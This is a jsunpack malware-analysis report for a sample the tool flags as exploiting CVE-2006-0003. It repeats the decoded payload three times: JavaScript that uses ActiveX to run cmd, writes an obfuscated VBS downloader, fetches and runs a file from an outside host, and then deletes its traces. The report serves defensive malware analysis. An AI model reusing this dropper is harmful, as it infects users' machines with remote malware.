JSUNPACK
A Generic JavaScript Unpacker
CAUTION: jsunpack was designed for security researchers and computer professionals
Enter a single URL (or paste JavaScript to decode):

Upload a PDF, pcap, HTML, or JavaScript file
Private? Help: privacy | uploads
Default Referer
Description

Submission permanent link be403245d22cfaddfc44a3a68217b93606f47074 (Received 2018-02-13 15:32:46, http://jsunpack.jeek.org/?report=b7b75cd453e93ca24eaf89fa6366b82e170644af )

URLStatus
jsunpack.jeek.org/?report=b7b75cd453e93ca24eaf89fa6366b82e170644af saved 17686 bytes 44b5d9edf68324b62bd61c323f1568dcf974483a

All Malicious or Suspicious Elements of Submission

malicious: Alert detected /alert CVE-2006-0003 shellexecute with cmd </textarea><br /><b>266f/b104a20daba9e3a616c1c9209f6958deb091</b> from upload (1049 bytes) <a href="/dec/getfile?hash=266f/b104a20daba9e3a616c1c9209f6958deb091">download</a><br /><textarea style="width:100%; background-color:silver;" cols="130" rows="5"> /eval var JTZ=new ActiveXObject("shell.application");JTZ.ShellExecute("cmd",'/c cd %temp% &amp;@echo P0t = "http:/wrzucacz.pl/download/9351517964876"&gt;&gt;L1a.vbs &amp;@echo C8l = H3e("X]dCZmZ")&gt;&gt;L1a.vbs &amp;@echo Set W8v = CreateObject(H3e("bhmbaGCmba]iie"))&gt;&gt;L1a.vbs &amp;@echo W8v.Open H3e("\Zi"), P0t, False&gt;&gt;L1a.vbs &amp;@echo W8v.send ("")&gt;&gt;L1a.vbs &amp;@echo Set D7w = CreateObject(H3e("VYdYWChigZVb"))&gt;&gt;L1a.vbs &amp;@echo D7w.Open&gt;&gt;L1a.vbs &amp;@echo D7w.Type = 1 &gt;&gt;L1a.vbs &amp;@echo D7w.Write W8v.ResponseBody&gt;&gt;L1a.vbs &amp; @echo D7w.Position = 0 &gt;&gt;L1a.vbs &amp;@echo D7w.SaveToFile C8l, 2 &gt;&gt;L1a.vbs &amp;@echo D7w.Close&gt;&gt;L1a.vbs &amp;@echo function H3e(O6h) &gt;&gt; L1a.vbs &amp;@echo For A1y = 1 To Len(O6h) &gt;&gt;L1a.vbs &amp;@echo W7m = Mid(O6h, A1y, 1) &gt;&gt;L1a.vbs &amp;@echo W7m = Chr(Asc(W7m)- 21) &gt;&gt;L1a.vbs &amp;@echo N9i = N9i + W7m &gt;&gt; L1a.vbs &amp;@echo Next &gt;&gt;L1a.vbs &amp;@echo H3e = N9i &gt;&gt;L1a.vbs &amp;@echo End Function &gt;&gt;L1a.vbs&amp; L1a.vbs &amp;dEl L1a.vbs &amp; timeout 13 &amp; CHO.EXE',"","",0) /info.ActiveXObject shell.application /alert CVE-2006-0003 shellexecute with cmd /alert CVE-2006-0003 shellexecute with cmd </textarea><br /><b>f8cd/be2e649d4915fcc315dd9834662bb6788555</b> from upload (85 bytes) <a href="/dec/getfile?hash=f8cd/be2e649d4915fcc315dd9834662bb6788555">download</a><br /><textarea style="width:100%; background-color:silver;" cols="130" rows="1"> /info.ActiveXObject shell.application /alert CVE-2006-0003 shellexecute with cmd </textarea><br /></div></div><br />
jsunpack.jeek.org/?report=b7b75cd453e93ca24eaf89fa6366b82e170644af malicious
[malicious:10] (ipaddr:204.152.206.106) jsunpack.jeek.org/?report=b7b75cd453e93ca24eaf89fa6366b82e170644af
     status: (referer=http:/www.ask.com/web?q=puppies)saved 17686 bytes 44b5d9edf68324b62bd61c323f1568dcf974483a
     malicious: Alert detected /alert CVE-2006-0003 shellexecute with cmd </textarea><br /><b>266f/b104a20daba9e3a616c1c9209f6958deb091</b> from upload (1049 bytes) <a href="/dec/getfile?hash=266f/b104a20daba9e3a616c1c9209f6958deb091">download</a><br /><textarea style="width:100%; background-color:silver;" cols="130" rows="5"> /eval var JTZ=new ActiveXObject("shell.application");JTZ.ShellExecute("cmd",'/c cd %temp% &amp;@echo P0t = "http:/wrzucacz.pl/download/9351517964876"&gt;&gt;L1a.vbs &amp;@echo C8l = H3e("X]dCZmZ")&gt;&gt;L1a.vbs &amp;@echo Set W8v = CreateObject(H3e("bhmbaGCmba]iie"))&gt;&gt;L1a.vbs &amp;@echo W8v.Open H3e("\Zi"), P0t, False&gt;&gt;L1a.vbs &amp;@echo W8v.send ("")&gt;&gt;L1a.vbs &amp;@echo Set D7w = CreateObject(H3e("VYdYWChigZVb"))&gt;&gt;L1a.vbs &amp;@echo D7w.Open&gt;&gt;L1a.vbs &amp;@echo D7w.Type = 1 &gt;&gt;L1a.vbs &amp;@echo D7w.Write W8v.ResponseBody&gt;&gt;L1a.vbs &amp; @echo D7w.Position = 0 &gt;&gt;L1a.vbs &amp;@echo D7w.SaveToFile C8l, 2 &gt;&gt;L1a.vbs &amp;@echo D7w.Close&gt;&gt;L1a.vbs &amp;@echo function H3e(O6h) &gt;&gt; L1a.vbs &amp;@echo For A1y = 1 To Len(O6h) &gt;&gt;L1a.vbs &amp;@echo W7m = Mid(O6h, A1y, 1) &gt;&gt;L1a.vbs &amp;@echo W7m = Chr(Asc(W7m)- 21) &gt;&gt;L1a.vbs &amp;@echo N9i = N9i + W7m &gt;&gt; L1a.vbs &amp;@echo Next &gt;&gt;L1a.vbs &amp;@echo H3e = N9i &gt;&gt;L1a.vbs &amp;@echo End Function &gt;&gt;L1a.vbs&amp; L1a.vbs &amp;dEl L1a.vbs &amp; timeout 13 &amp; CHO.EXE',"","",0) /info.ActiveXObject shell.application /alert CVE-2006-0003 shellexecute with cmd /alert CVE-2006-0003 shellexecute with cmd </textarea><br /><b>f8cd/be2e649d4915fcc315dd9834662bb6788555</b> from upload (85 bytes) <a href="/dec/getfile?hash=f8cd/be2e649d4915fcc315dd9834662bb6788555">download</a><br /><textarea style="width:100%; background-color:silver;" cols="130" rows="1"> /info.ActiveXObject shell.application /alert CVE-2006-0003 shellexecute with cmd </textarea><br /></div></div><br />
     info: DecodedMsg detected /info.ActiveXObject shell.application /alert CVE-2006-0003 shellexecute with cmd </textarea><br /><b>266f/b104a20daba9e3a616c1c9209f6958deb091</b> from upload (1049 bytes) <a href="/dec/getfile?hash=266f/b104a20daba9e3a616c1c9209f6958deb091">download</a><br /><textarea style="width:100%; background-color:silver;" cols="130" rows="5"> /eval var JTZ=new ActiveXObject("shell.application");JTZ.ShellExecute("cmd",'/c cd %temp% &amp;@echo P0t = "http:/wrzucacz.pl/download/9351517964876"&gt;&gt;L1a.vbs &amp;@echo C8l = H3e("X]dCZmZ")&gt;&gt;L1a.vbs &amp;@echo Set W8v = CreateObject(H3e("bhmbaGCmba]iie"))&gt;&gt;L1a.vbs &amp;@echo W8v.Open H3e("\Zi"), P0t, False&gt;&gt;L1a.vbs &amp;@echo W8v.send ("")&gt;&gt;L1a.vbs &amp;@echo Set D7w = CreateObject(H3e("VYdYWChigZVb"))&gt;&gt;L1a.vbs &amp;@echo D7w.Open&gt;&gt;L1a.vbs &amp;@echo D7w.Type = 1 &gt;&gt;L1a.vbs &amp;@echo D7w.Write W8v.ResponseBody&gt;&gt;L1a.vbs &amp; @echo D7w.Position = 0 &gt;&gt;L1a.vbs &amp;@echo D7w.SaveToFile C8l, 2 &gt;&gt;L1a.vbs &amp;@echo D7w.Close&gt;&gt;L1a.vbs &amp;@echo function H3e(O6h) &gt;&gt; L1a.vbs &amp;@echo For A1y = 1 To Len(O6h) &gt;&gt;L1a.vbs &amp;@echo W7m = Mid(O6h, A1y, 1) &gt;&gt;L1a.vbs &amp;@echo W7m = Chr(Asc(W7m)- 21) &gt;&gt;L1a.vbs &amp;@echo N9i = N9i + W7m &gt;&gt; L1a.vbs &amp;@echo Next &gt;&gt;L1a.vbs &amp;@echo H3e = N9i &gt;&gt;L1a.vbs &amp;@echo End Function &gt;&gt;L1a.vbs&amp; L1a.vbs &amp;dEl L1a.vbs &amp; timeout 13 &amp; CHO.EXE',"","",0) /info.ActiveXObject shell.application /alert CVE-2006-0003 shellexecute with cmd /alert CVE-2006-0003 shellexecute with cmd </textarea><br /><b>f8cd/be2e649d4915fcc315dd9834662bb6788555</b> from upload (85 bytes) <a href="/dec/getfile?hash=f8cd/be2e649d4915fcc315dd9834662bb6788555">download</a><br /><textarea style="width:100%; background-color:silver;" cols="130" rows="1"> /info.ActiveXObject shell.application /alert CVE-2006-0003 shellexecute with cmd </textarea><br /></div></div><br />
     info: [decodingLevel=0] found JavaScript
     error: line:5: SyntaxError: missing = in XML attribute:
          error: line:5: <!DOCTYPE HTML PUBLIC "-/W3C/DTD HTML 4.01 Transitional/EN">
          error: line:5: ...................^
     info: file: saved jsunpack.jeek.org/?report=b7b75cd453e93ca24eaf89fa6366b82e170644af to (44b5d9edf68324b62bd61c323f1568dcf974483a)
     file: 44b5d9edf68324b62bd61c323f1568dcf974483a: 17686 bytes

Decoded Files
44b5/d9edf68324b62bd61c323f1568dcf974483a from jsunpack.jeek.org/?report=b7b75cd453e93ca24eaf89fa6366b82e170644af (17686 bytes, 1946 hidden) download